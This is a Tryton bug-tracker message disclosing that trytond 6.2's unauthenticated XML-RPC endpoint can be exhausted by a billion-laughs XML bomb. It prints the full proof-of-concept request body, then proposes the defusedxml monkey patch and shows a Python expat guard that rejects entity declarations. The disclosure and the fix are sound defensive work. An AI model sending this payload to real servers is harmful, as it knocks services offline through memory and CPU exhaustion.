Message 74016

Author
jeremy.mousset
Date
2022-02-11.13:03:34
Message id
74016

Content

Tested against trytond 6.2 with Python 3.8.10

A non-authenticated user can saturate the trytond server's memory and CPU usage with a single xmlrpc request, using the billion laughs attack or other similar "xml bomb" attacks.

Request example [do not test it against a production server of course :)]:

url: http://example.trytond.com/
method: POST

headers:
Content-Type: text/xml

body:

<?xml version='1.0'?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<methodCall>
<methodName>&lol9;</methodName>
<params>
</params>
</methodCall>

When the trytond server receives the request, its RAM usage quickly skyrockets, and the CPU also becomes very busy.
When testing the request on my machine, the 16 GB of RAM and 1 GB of swap were full in under a minute.

defusedxml has a monkey patch for this.

If we use this monkey patch by adding the following to trytond/protocols/xmlrpc.py:

 from defusedxml.xmlrpc import monkey_patch
 monkey_patch()

then the server will respond to the same request with:

"400 Bad Request: Unable to read XMl request".
(because the monkey patch forbids it)

So, it does look like a simple protection against this attack and similar "xml bomb" attacks.
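A guard that rejects such bodies before they reach the XML-RPC unmarshaller, as an added example (not trytond's code and not defusedxml's): it scans the request with Python's expat and aborts on the first entity declaration, so nothing is ever expanded. It assumes the server otherwise hands the raw body to xmlrpc.client.loads; the function names and the two sample bodies are constructed for this illustration.

```python
import xml.parsers.expat
import xmlrpc.client


class ForbiddenXML(ValueError):
    """The body uses a DTD/entity construct this server refuses to parse."""


def check_xmlrpc_body(data: bytes, forbid_dtd: bool = False) -> None:
    """Raise ForbiddenXML on any entity declaration (or any DOCTYPE when
    forbid_dtd=True).  The scan aborts inside the prolog, before expat reaches
    an entity reference in content, so a billion-laughs payload never expands."""
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, *_):
        raise ForbiddenXML("entity declaration %r not allowed" % name)

    def on_doctype(name, *_):
        if forbid_dtd:
            raise ForbiddenXML("DOCTYPE %r not allowed" % name)

    parser.EntityDeclHandler = on_entity_decl
    parser.StartDoctypeDeclHandler = on_doctype
    # Never resolve SYSTEM/PUBLIC external entities (returning 0 fails the parse).
    parser.ExternalEntityRefHandler = lambda *_: 0
    parser.Parse(data, True)


def parse_request(data: bytes):
    """Guarded parse: reject bombs first, then unmarshal like xmlrpc.client.loads."""
    check_xmlrpc_body(data)
    return xmlrpc.client.loads(data)


def is_rejected(data: bytes, **kwargs) -> bool:
    """True if the guard refuses `data` (small helper for checks)."""
    try:
        check_xmlrpc_body(data, **kwargs)
    except ForbiddenXML:
        return True
    return False


# Constructed samples: a shallow cousin of the reported bomb, and a clean call.
BOMB = b"""<?xml version='1.0'?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
]>
<methodCall><methodName>&lol1;</methodName><params></params></methodCall>"""
CLEAN = (b"<?xml version='1.0'?><methodCall><methodName>ping</methodName>"
         b"<params><param><value><int>1</int></value></param></params></methodCall>")
```

Rejecting entity declarations (the default here) is enough against entity-expansion bombs; forbid_dtd=True is the stricter setting for a server whose clients never send a DOCTYPE at all.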

History
Date | User | Action | Args
2022-02-11 13:03:35 | jeremy.mousset | setrecipients | + ced, yangoon, nicoe, pokoli, roundup-bot, reviewbot
2022-02-11 13:03:34 | jeremy.mousset | setmessageid | <1644581014.9802082.6FFD7HNFX552PELZ.issue11244@tryton.org>
2022-02-11 13:03:34 | jeremy.mousset | link | issue11244 messages
2022-02-11 13:03:34 | jeremy.mousset | create |
